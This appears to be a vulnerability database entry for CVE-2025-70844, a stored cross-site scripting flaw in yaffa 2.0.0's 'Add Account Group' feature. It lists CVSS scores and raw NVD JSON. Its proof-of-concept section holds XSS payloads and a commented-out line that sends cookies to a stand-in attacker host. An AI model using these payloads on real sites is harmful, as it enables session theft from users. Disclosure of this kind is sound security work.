Security Vulnerability Report
中文
CVE-2025-70844 CVSS 6.1 MEDIUM

CVE-2025-70844

Published: 2026-04-07 17:16:26
Last Modified: 2026-04-14 15:46:13

Description

yaffa v2.0.0 is vulnerable to Cross Site Scripting (XSS). An attacker can inject malicious JavaScript into the "Add Account Group" function on the account-group page, allowing execution of arbitrary script in the context of users who view the affected page.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kantorge:yaffa:2.0.0:*:*:*:*:*:*:* - VULNERABLE
yaffa 2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2025-70844: XSS in Add Account Group --> <!-- Attacker injects this payload into the account group name --> <script> // Basic Proof of Concept to demonstrate execution alert('CVE-2025-70844 XSS Executed'); // Exfiltration example (simulated) // var img = new Image(); // img.src = "http://attacker-server.com/steal?cookie=" + document.cookie; </script> <!-- Or using an img tag to trigger onerror without script tags --> <img src=x onerror=alert('CVE-2025-70844')>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-70844", "sourceIdentifier": "[email protected]", "published": "2026-04-07T17:16:26.297", "lastModified": "2026-04-14T15:46:12.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "yaffa v2.0.0 is vulnerable to Cross Site Scripting (XSS). An attacker can inject malicious JavaScript into the \"Add Account Group\" function on the account-group page, allowing execution of arbitrary script in the context of users who view the affected page."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kantorge:yaffa:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D877A7F1-A45B-4E7C-9686-FF494E9F679D"}]}]}], "references": [{"url": "https://github.com/J4cky1028/vulnerability-research/tree/main/CVE-2025-70844", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/kantorge/yaffa", "source": "[email protected]", "tags": ["Product"]}]}}